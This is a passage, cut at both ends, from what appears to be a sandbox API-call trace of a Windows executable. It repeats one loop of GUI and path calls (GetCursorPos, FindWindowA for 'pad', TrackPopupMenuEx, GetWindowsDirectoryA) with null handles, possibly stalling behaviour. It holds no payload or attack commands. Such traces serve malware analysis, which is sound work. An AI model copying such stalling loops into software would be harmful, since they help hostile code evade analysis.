param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.577] GetStockObject (i=6) returned 0x1b00018 [0027.577] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.577] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.577] PathFileExistsW (pszPath=0x0) returned 0 [0027.577] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.577] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.577] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.577] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.577] GetMenu (hWnd=0x0) returned 0x0 [0027.577] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x330) returned -1 [0027.577] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.577] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.577] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.577] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.577] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.577] GetStockObject (i=6) returned 0x1b00018 [0027.577] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.577] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.577] PathFileExistsW (pszPath=0x0) returned 0 [0027.577] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.578] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.578] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.578] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.578] GetMenu (hWnd=0x0) returned 0x0 [0027.578] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.578] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.578] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.578] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.578] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.578] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.578] GetStockObject (i=6) returned 0x1b00018 [0027.578] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.578] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.578] PathFileExistsW (pszPath=0x0) returned 0 [0027.578] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.578] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.578] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.578] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.578] GetMenu (hWnd=0x0) returned 0x0 [0027.578] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x336) returned -1 [0027.578] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.578] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.578] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.578] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.578] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.578] GetStockObject (i=6) returned 0x1b00018 [0027.578] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.578] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.578] PathFileExistsW (pszPath=0x0) returned 0 [0027.578] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.578] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.578] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.578] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.578] GetMenu (hWnd=0x0) returned 0x0 [0027.579] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x3e8) returned -1 [0027.579] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.579] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.579] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.579] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.579] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.579] GetStockObject (i=6) returned 0x1b00018 [0027.579] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.579] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.579] PathFileExistsW (pszPath=0x0) returned 0 [0027.579] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.579] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.579] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.579] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.579] GetMenu (hWnd=0x0) returned 0x0 [0027.579] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.579] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.579] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.579] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.579] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.579] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.579] GetStockObject (i=6) returned 0x1b00018 [0027.579] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.579] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.579] PathFileExistsW (pszPath=0x0) returned 0 [0027.579] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.579] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.579] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.579] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.579] GetMenu (hWnd=0x0) returned 0x0 [0027.579] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.579] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.579] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.579] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.579] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.580] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.580] GetStockObject (i=6) returned 0x1b00018 [0027.580] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.580] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.580] PathFileExistsW (pszPath=0x0) returned 0 [0027.580] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.580] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.580] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.580] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.580] GetMenu (hWnd=0x0) returned 0x0 [0027.580] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.580] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.580] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.580] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.580] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.580] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.580] GetStockObject (i=6) returned 0x1b00018 [0027.580] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.580] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.580] PathFileExistsW (pszPath=0x0) returned 0 [0027.580] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.580] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.580] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.580] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.580] GetMenu (hWnd=0x0) returned 0x0 [0027.580] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x332) returned -1 [0027.580] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.580] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.580] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.580] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.580] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.580] GetStockObject (i=6) returned 0x1b00018 [0027.580] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.581] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.581] PathFileExistsW (pszPath=0x0) returned 0 [0027.581] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.581] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.581] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.581] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.581] GetMenu (hWnd=0x0) returned 0x0 [0027.581] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x322) returned -1 [0027.581] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.581] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.581] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.581] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.581] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.581] GetStockObject (i=6) returned 0x1b00018 [0027.581] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.581] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.581] PathFileExistsW (pszPath=0x0) returned 0 [0027.581] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.581] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.581] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.581] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.581] GetMenu (hWnd=0x0) returned 0x0 [0027.581] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.581] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.581] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.581] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.581] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.581] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.581] GetStockObject (i=6) returned 0x1b00018 [0027.581] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.581] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.581] PathFileExistsW (pszPath=0x0) returned 0 [0027.581] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.582] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.582] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.582] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.582] GetMenu (hWnd=0x0) returned 0x0 [0027.582] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x336) returned -1 [0027.582] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.582] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.582] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.582] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.582] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.582] GetStockObject (i=6) returned 0x1b00018 [0027.582] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.582] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.582] PathFileExistsW (pszPath=0x0) returned 0 [0027.582] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.582] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.582] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.582] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.582] GetMenu (hWnd=0x0) returned 0x0 [0027.582] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.582] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.582] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.582] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.582] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.582] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.582] GetStockObject (i=6) returned 0x1b00018 [0027.582] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.582] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.582] PathFileExistsW (pszPath=0x0) returned 0 [0027.582] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.582] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.582] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.582] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.582] GetMenu (hWnd=0x0) returned 0x0 [0027.583] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x334) returned -1 [0027.583] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.583] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.583] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.583] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.583] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.583] GetStockObject (i=6) returned 0x1b00018 [0027.583] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.583] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.583] PathFileExistsW (pszPath=0x0) returned 0 [0027.583] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.583] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.583] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.583] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.583] GetMenu (hWnd=0x0) returned 0x0 [0027.583] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0xa2) returned -1 [0027.583] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.583] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.583] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.583] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.583] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.583] GetStockObject (i=6) returned 0x1b00018 [0027.583] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.583] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.583] PathFileExistsW (pszPath=0x0) returned 0 [0027.583] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.583] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.583] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.583] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.583] GetMenu (hWnd=0x0) returned 0x0 [0027.583] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.583] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.583] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.583] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.583] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.584] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.584] GetStockObject (i=6) returned 0x1b00018 [0027.584] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.584] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.584] PathFileExistsW (pszPath=0x0) returned 0 [0027.584] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.584] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.584] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.584] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.584] GetMenu (hWnd=0x0) returned 0x0 [0027.584] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x336) returned -1 [0027.584] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.584] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.584] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.584] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.584] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.584] GetStockObject (i=6) returned 0x1b00018 [0027.584] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.584] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.584] PathFileExistsW (pszPath=0x0) returned 0 [0027.584] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.584] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.584] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.584] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.584] GetMenu (hWnd=0x0) returned 0x0 [0027.584] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.584] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.584] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.584] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.584] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.584] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.584] GetStockObject (i=6) returned 0x1b00018 [0027.584] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.585] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.585] PathFileExistsW (pszPath=0x0) returned 0 [0027.585] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.585] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.585] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.585] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.585] GetMenu (hWnd=0x0) returned 0x0 [0027.585] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x336) returned -1 [0027.585] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.585] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.585] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.585] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.585] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.585] GetStockObject (i=6) returned 0x1b00018 [0027.585] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.585] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.585] PathFileExistsW (pszPath=0x0) returned 0 [0027.585] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.585] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.585] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.585] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.585] GetMenu (hWnd=0x0) returned 0x0 [0027.585] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x20b) returned -1 [0027.585] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.585] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.585] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.585] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.585] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.585] GetStockObject (i=6) returned 0x1b00018 [0027.585] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.585] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.585] PathFileExistsW (pszPath=0x0) returned 0 [0027.585] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.586] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.586] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.586] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.586] GetMenu (hWnd=0x0) returned 0x0 [0027.586] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.586] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.586] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.586] GetSubMenu 